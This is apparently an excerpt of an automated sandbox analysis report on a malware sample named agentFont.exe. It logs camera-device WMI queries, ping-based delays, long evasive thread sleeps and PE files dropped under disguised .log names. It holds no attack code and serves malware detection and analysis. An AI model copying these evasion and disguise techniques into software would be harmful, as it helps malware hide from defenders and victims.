                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Uses ping.exe to sleep
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1B3A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 27B0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1A970000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 6F0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1A610000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1590000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 2690000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1880000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1B340000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599818
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599656
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599546
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599437
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599328
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599218
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599109
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598998
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598890
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 3600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598781
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598668
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598297
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597891
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597750
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597639
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597469
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597337
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597203
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 597086
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596983
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596874
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596762
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596656
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596547
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596437
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596266
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596154
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 596031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595900
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595796
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595305
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 595078
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594953
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594844
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594734
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594625
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594515
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594403
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594285
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594156
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 594031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593922
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593811
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593703
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593594
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593484
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593375
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593203
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 593078
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592962
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592625
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592277
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592150
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 592031
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 591922
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 591812
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3542Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1911
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3270
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2893
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2609
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2103
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWindow / User API: threadDelayed 9663
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\kZFyeAfm.logJump to dropped file
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dllJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\cvxIvGPF.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\HOfmkikL.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\HhjUFBqv.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\rEqPmwUs.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exeDropped PE file which has not been started: C:\Users\user\Desktop\AnJfWYZZ.logJump to dropped file
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 2196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692Thread sleep count: 3542 > 30Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 1911 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 3270 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 2893 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 2609 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 2103 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 5316Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 7768Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe TID: 6008Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 2304Thread sleep time: -30000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -33204139332677172s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -600000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599818s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599656s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599546s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599437s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599328s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599218s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -599109s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -598998s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -598890s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 1148Thread sleep time: -14400000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -598781s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -598668s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -598297s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597891s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597750s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597639s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597469s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597337s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597203s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -597086s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596983s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596874s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596762s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596656s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596547s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596437s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596266s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596154s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -596031s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -595900s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -595796s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -595305s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -595078s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594953s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594844s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594734s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048Thread sleep time: -594625s >= -30000s
